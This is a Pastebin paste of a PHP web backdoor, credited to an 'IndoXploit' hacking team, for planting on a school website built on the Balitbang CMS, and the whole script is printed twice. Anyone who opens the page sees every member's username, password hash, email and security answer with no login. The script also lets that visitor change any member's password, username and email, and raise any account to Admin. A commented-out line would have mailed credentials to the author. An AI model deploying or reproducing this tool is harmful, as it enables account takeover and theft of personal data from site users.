Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // global setting
- //$email = "aiharaanwaru01@gmail.com"; // email mu, fungsi menerima pesan berupa user dan password
- $evil = "koneksi.php"; // ganti dengan lokasi file koneksi.php - misal /functions/koneksi.php atau ../function/koneksi.php sesuai letak file ini
- include "$evil";
- //===============================================
- $hal=$_GET['hal'];
- $ket=$_GET['ket'];
- echo "<html><title> IndoXploit </title>";
- echo "<body bgcolor='#000000' text='#00ff00'>";
- echo "<center><font class='ari12' style='color:#00ff00'><b>IndoXploit Coder Team<br /> Balitbang MEMBERS View <br /> By Aihara Anwaru [ Falcon-G21 Team Dark ]</b></font></center><br />";
- if ($ket=='') $ket='Tamu';
- $brs=30;
- $kol=10;
- $byk_result1=mysql_query("select * from t_member where ket='". mysql_escape_string($ket)."'");
- $byk=mysql_num_rows($byk_result1);
- if ($byk<=$brs)
- $jml=0;
- else
- {
- $jml=floor($byk / $brs);
- $sisa= $byk % $brs;
- if ($sisa!=0)
- $jml++;
- }
- if ($hal=="")
- $awal=0;
- else
- $awal=$brs*($hal-1);
- if ($hal=="") $hal=1;
- $back=$hal-1;
- $next=$hal+1;
- if ($hal==1) $back=1;
- if ($hal==$jml) $next=$jml;
- $mulai=1;
- $batas=$jml;
- if ($jml>$kol)
- $batas=$kol;
- if ($hal>$kol) {
- $mulai=1+$hal-$kol;
- $batas=$hal;
- }
- $query = "SELECT * from t_member where ket='". mysql_escape_string($ket)."' order by status,nama LIMIT ".$awal.",".$brs."";
- $q= mysql_query ($query) or die (mysql_error());
- $n = mysql_num_rows ($q);
- if ($ket=='Tamu') $s1='selected';
- elseif ($ket=='Alumni') $s2='selected';
- elseif ($ket=='Siswa') $s3='selected';
- elseif ($ket=='Orang Tua') $s4='selected';
- elseif ($ket=='Admin') $s6='selected';
- elseif ($ket=='Guru') $s5='selected';
- echo "<center><a href='?indo=xploit'>Home</a> | <a href='?indo=xploit&ket=Tamu'>Tamu</a> | <a href='?indo=xploit&ket=Alumni'>Alumni</a> | <a href='?indo=xploit&ket=Siswa'>Siswa</a> | <a href='?indo=xploit&ket=Orang Tua'>Orang Tua</a> | <a href='?indo=xploit&ket=Guru'>Guru</a> | <a href='?indo=xploit&ket=Admin'>Admin</a><br /><br />
- ";
- if ($jml!=0) {
- echo "<font class='ver10'><a href='member.php?indo=xploit&ket=$ket&hal=1' class=ver10 title='Page 1'>First </a> <a href='member.php?indo=xploit&ket=$ket&hal=$back' class='ver10' title='$back'>Back </a> |";
- for($i=$mulai;$i<=$batas;$i++)
- {
- if ($i==$hal)
- echo "<b><a href='member.php?indo=xploit&ket=$ket&hal=$i' class='ver10' title='Page $i from $byk Data'> $i </a></b> |";
- else
- echo "<a href='member.php?indo=xploit&ket=$ket&hal=$i' class='ver10' title='Page $i from $byk Data'> $i </a> |";
- }
- echo "<a href='member.php?indo=xploit&ket=$ket&hal=$next' class='ver10' title='$next'> Next</a>
- <a href='member.php?indo=xploit&ket=$ket&hal=$jml' class='ver10' title='Page $jml'> Last</a></font></center>";
- }
- while($row=mysql_fetch_array($q)) {
- $file ="../member/profil/gb$row[userid].jpg";
- $gb="<a href='#' title='$row[nama]'><img src='../member/profil/kosong.jpg' width='60' height='75' align=left></a>";
- if (file_exists(''.$file.'')) {
- $gb="<a href='#' title='$row[nama]'><img src='$file' width='60' height='75' align=left></a>";
- }
- if ($row[kelamin]=="m") $kelamin="Male";
- else $kelamin="Female";
- $tgllogin= date("d-m-Y s:i", strtotime($row[tgl_login]));
- $v="<b>Valid ($row[17])</b>";
- $valid="";
- $warna="#990000";
- if ($row[status]=='0') {$v="<font color='$warna'><b>No Valid ($row[17])</b></font>";}
- $valid="$v";
- $br = "<br />";
- echo "</center>
- Userid :<b> $row[0] </b> $br
- Status : $valid $br
- Name: <b> $row[1] </b> $br
- Username :<b> $row[11] </b> - <a href='?xploit=change_user&id=$row[0]'>Change Username</a> $br
- Password : <b> $row[12] </b> - <a href='?xploit=change_pass&id=$row[0]'>Change Password</a> $br
- E-mail : <b> $row[13] </b> - <a href='?xploit=change_email&id=$row[0]'>Change E-mail</a> $br
- Security Type : <b> $row[14] </b> $br
- Security Answer :<b> $row[15] </b> $br
- Kategori : <b> $row[16] </b> $br
- ID Type : <b> $row[21] </b> - <a href='?xploit=change_IT&id=$row[0]'>Change ID Type</a> $br
- Point : <b> $row[24] </b> $br
- Status Login : <b> $row[25] </b> $br
- Total Login : <b> $row[26] </b> $br
- IP : <b> $row[27] </b> $br $br";
- }
- if($_GET['xploit']== 'change_pass'){
- include "$evil";
- $kode=$_GET['id'];
- echo "<form action='' method='post'>Pass : <input type='text' name='aru'><input type='submit' name='ai0' value='Change'></form>";
- if(isset($_POST['ai0'])){
- $mimi = $_POST['aru'];
- $pass = rand(111111,999999);
- $blank = "$mimi$pass";
- $password=md5($blank);
- $query="update t_member set password='$password' where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $row = mysql_fetch_array($result);
- //if(!@mail($email,"Konfirmasi Password","Password Baru Anda= $blank<br> Terima kasih webmaster $webhost","From: $webmail")) {
- // echo "Gagal kirim email<br>";
- // }
- echo "<font>Data Password member telah diupdate. Menjadi :<b> $blank</b><br>";
- }
- }
- if($_GET['xploit']== 'change_user'){
- include "$evil";
- $kode=$_GET['id'];
- echo "<form action='' method='post'>User : <input type='text' name='yuser'><input type='submit' name='ai1' value='Change'></form>";
- if(isset($_POST['ai1'])){
- $xuser=$_POST['yuser'];
- $query="update t_member set username='$xuser' where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $row = mysql_fetch_array($result);
- echo "Data Username member telah diupdate. Menjadi : <b> $row[11] </b><br>";
- }
- }
- if($_GET['xploit']== 'change_IT'){
- include "$evil";
- $kode=$_GET['id'];
- echo "<form action='' method='post'>Change ID Type To : <select name='xxx'><option value='Tamu'>Tamu</option><option value='Alumni'>Alumni</option><option value='Siswa'>Siswa</option><option value='Orang Tua'>Orang Tua</option><option value='Guru'>Guru</option><option value='Admin'>Admin</option></select><input type='submit' name='ai2' value='Change'></form>";
- if(isset($_POST['ai2'])){
- $plo=$_POST['xxx'];
- $query="update t_member set ket='$plo' where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $row = mysql_fetch_array($result);
- echo "Data ID Type member telah diupdate. Menjadi : <b> $row[21] </b><br>";
- }
- }
- if($_GET['xploit']== 'change_email'){
- include "$evil";
- $kode=$_GET['id'];
- echo "<form action='' method='post'>E-mail : <input type='text' name='sumail'><input type='submit' name='ai3' value='Change'></form>";
- if(isset($_POST['ai3'])){
- $noob=$_POST['sumail'];
- $query="update t_member set email='$noob' where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $row = mysql_fetch_array($result);
- echo "Data E-mail member telah diupdate. Menjadi : <b> $row[13] </b><br>";
- }
- }
- ?><?php
- // global setting
- //$email = "aiharaanwaru01@gmail.com"; // email mu, fungsi menerima pesan berupa user dan password
- $evil = "koneksi.php"; // ganti dengan lokasi file koneksi.php - misal /functions/koneksi.php atau ../function/koneksi.php sesuai letak file ini
- include "$evil";
- //===============================================
- $hal=$_GET['hal'];
- $ket=$_GET['ket'];
- echo "<html><title> IndoXploit </title>";
- echo "<body bgcolor='#000000' text='#00ff00'>";
- echo "<center><font class='ari12' style='color:#00ff00'><b>IndoXploit Coder Team<br /> Balitbang MEMBERS View <br /> By Aihara Anwaru [ Falcon-G21 Team Dark ]</b></font></center><br />";
- if ($ket=='') $ket='Tamu';
- $brs=30;
- $kol=10;
- $byk_result1=mysql_query("select * from t_member where ket='". mysql_escape_string($ket)."'");
- $byk=mysql_num_rows($byk_result1);
- if ($byk<=$brs)
- $jml=0;
- else
- {
- $jml=floor($byk / $brs);
- $sisa= $byk % $brs;
- if ($sisa!=0)
- $jml++;
- }
- if ($hal=="")
- $awal=0;
- else
- $awal=$brs*($hal-1);
- if ($hal=="") $hal=1;
- $back=$hal-1;
- $next=$hal+1;
- if ($hal==1) $back=1;
- if ($hal==$jml) $next=$jml;
- $mulai=1;
- $batas=$jml;
- if ($jml>$kol)
- $batas=$kol;
- if ($hal>$kol) {
- $mulai=1+$hal-$kol;
- $batas=$hal;
- }
- $query = "SELECT * from t_member where ket='". mysql_escape_string($ket)."' order by status,nama LIMIT ".$awal.",".$brs."";
- $q= mysql_query ($query) or die (mysql_error());
- $n = mysql_num_rows ($q);
- if ($ket=='Tamu') $s1='selected';
- elseif ($ket=='Alumni') $s2='selected';
- elseif ($ket=='Siswa') $s3='selected';
- elseif ($ket=='Orang Tua') $s4='selected';
- elseif ($ket=='Admin') $s6='selected';
- elseif ($ket=='Guru') $s5='selected';
- echo "<center><a href='?indo=xploit'>Home</a> | <a href='?indo=xploit&ket=Tamu'>Tamu</a> | <a href='?indo=xploit&ket=Alumni'>Alumni</a> | <a href='?indo=xploit&ket=Siswa'>Siswa</a> | <a href='?indo=xploit&ket=Orang Tua'>Orang Tua</a> | <a href='?indo=xploit&ket=Guru'>Guru</a> | <a href='?indo=xploit&ket=Admin'>Admin</a><br /><br />
- ";
- if ($jml!=0) {
- echo "<font class='ver10'><a href='member.php?indo=xploit&ket=$ket&hal=1' class=ver10 title='Page 1'>First </a> <a href='member.php?indo=xploit&ket=$ket&hal=$back' class='ver10' title='$back'>Back </a> |";
- for($i=$mulai;$i<=$batas;$i++)
- {
- if ($i==$hal)
- echo "<b><a href='member.php?indo=xploit&ket=$ket&hal=$i' class='ver10' title='Page $i from $byk Data'> $i </a></b> |";
- else
- echo "<a href='member.php?indo=xploit&ket=$ket&hal=$i' class='ver10' title='Page $i from $byk Data'> $i </a> |";
- }
- echo "<a href='member.php?indo=xploit&ket=$ket&hal=$next' class='ver10' title='$next'> Next</a>
- <a href='member.php?indo=xploit&ket=$ket&hal=$jml' class='ver10' title='Page $jml'> Last</a></font></center>";
- }
- while($row=mysql_fetch_array($q)) {
- $file ="../member/profil/gb$row[userid].jpg";
- $gb="<a href='#' title='$row[nama]'><img src='../member/profil/kosong.jpg' width='60' height='75' align=left></a>";
- if (file_exists(''.$file.'')) {
- $gb="<a href='#' title='$row[nama]'><img src='$file' width='60' height='75' align=left></a>";
- }
- if ($row[kelamin]=="m") $kelamin="Male";
- else $kelamin="Female";
- $tgllogin= date("d-m-Y s:i", strtotime($row[tgl_login]));
- $v="<b>Valid ($row[17])</b>";
- $valid="";
- $warna="#990000";
- if ($row[status]=='0') {$v="<font color='$warna'><b>No Valid ($row[17])</b></font>";}
- $valid="$v";
- $br = "<br />";
- echo "</center>
- Userid :<b> $row[0] </b> $br
- Status : $valid $br
- Name: <b> $row[1] </b> $br
- Username :<b> $row[11] </b> - <a href='?xploit=change_user&id=$row[0]'>Change Username</a> $br
- Password : <b> $row[12] </b> - <a href='?xploit=change_pass&id=$row[0]'>Change Password</a> $br
- E-mail : <b> $row[13] </b> - <a href='?xploit=change_email&id=$row[0]'>Change E-mail</a> $br
- Security Type : <b> $row[14] </b> $br
- Security Answer :<b> $row[15] </b> $br
- Kategori : <b> $row[16] </b> $br
- ID Type : <b> $row[21] </b> - <a href='?xploit=change_IT&id=$row[0]'>Change ID Type</a> $br
- Point : <b> $row[24] </b> $br
- Status Login : <b> $row[25] </b> $br
- Total Login : <b> $row[26] </b> $br
- IP : <b> $row[27] </b> $br $br";
- }
- if($_GET['xploit']== 'change_pass'){
- include "$evil";
- $kode=$_GET['id'];
- echo "<form action='' method='post'>Pass : <input type='text' name='aru'><input type='submit' name='ai0' value='Change'></form>";
- if(isset($_POST['ai0'])){
- $mimi = $_POST['aru'];
- $pass = rand(111111,999999);
- $blank = "$mimi$pass";
- $password=md5($blank);
- $query="update t_member set password='$password' where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $row = mysql_fetch_array($result);
- //if(!@mail($email,"Konfirmasi Password","Password Baru Anda= $blank<br> Terima kasih webmaster $webhost","From: $webmail")) {
- // echo "Gagal kirim email<br>";
- // }
- echo "<font>Data Password member telah diupdate. Menjadi :<b> $blank</b><br>";
- }
- }
- if($_GET['xploit']== 'change_user'){
- include "$evil";
- $kode=$_GET['id'];
- echo "<form action='' method='post'>User : <input type='text' name='yuser'><input type='submit' name='ai1' value='Change'></form>";
- if(isset($_POST['ai1'])){
- $xuser=$_POST['yuser'];
- $query="update t_member set username='$xuser' where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $row = mysql_fetch_array($result);
- echo "Data Username member telah diupdate. Menjadi : <b> $row[11] </b><br>";
- }
- }
- if($_GET['xploit']== 'change_IT'){
- include "$evil";
- $kode=$_GET['id'];
- echo "<form action='' method='post'>Change ID Type To : <select name='xxx'><option value='Tamu'>Tamu</option><option value='Alumni'>Alumni</option><option value='Siswa'>Siswa</option><option value='Orang Tua'>Orang Tua</option><option value='Guru'>Guru</option><option value='Admin'>Admin</option></select><input type='submit' name='ai2' value='Change'></form>";
- if(isset($_POST['ai2'])){
- $plo=$_POST['xxx'];
- $query="update t_member set ket='$plo' where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $row = mysql_fetch_array($result);
- echo "Data ID Type member telah diupdate. Menjadi : <b> $row[21] </b><br>";
- }
- }
- if($_GET['xploit']== 'change_email'){
- include "$evil";
- $kode=$_GET['id'];
- echo "<form action='' method='post'>E-mail : <input type='text' name='sumail'><input type='submit' name='ai3' value='Change'></form>";
- if(isset($_POST['ai3'])){
- $noob=$_POST['sumail'];
- $query="update t_member set email='$noob' where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $query="select * from t_member where userid='". mysql_escape_string($kode)."'";
- $result = mysql_query($query);
- $row = mysql_fetch_array($result);
- echo "Data E-mail member telah diupdate. Menjadi : <b> $row[13] </b><br>";
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement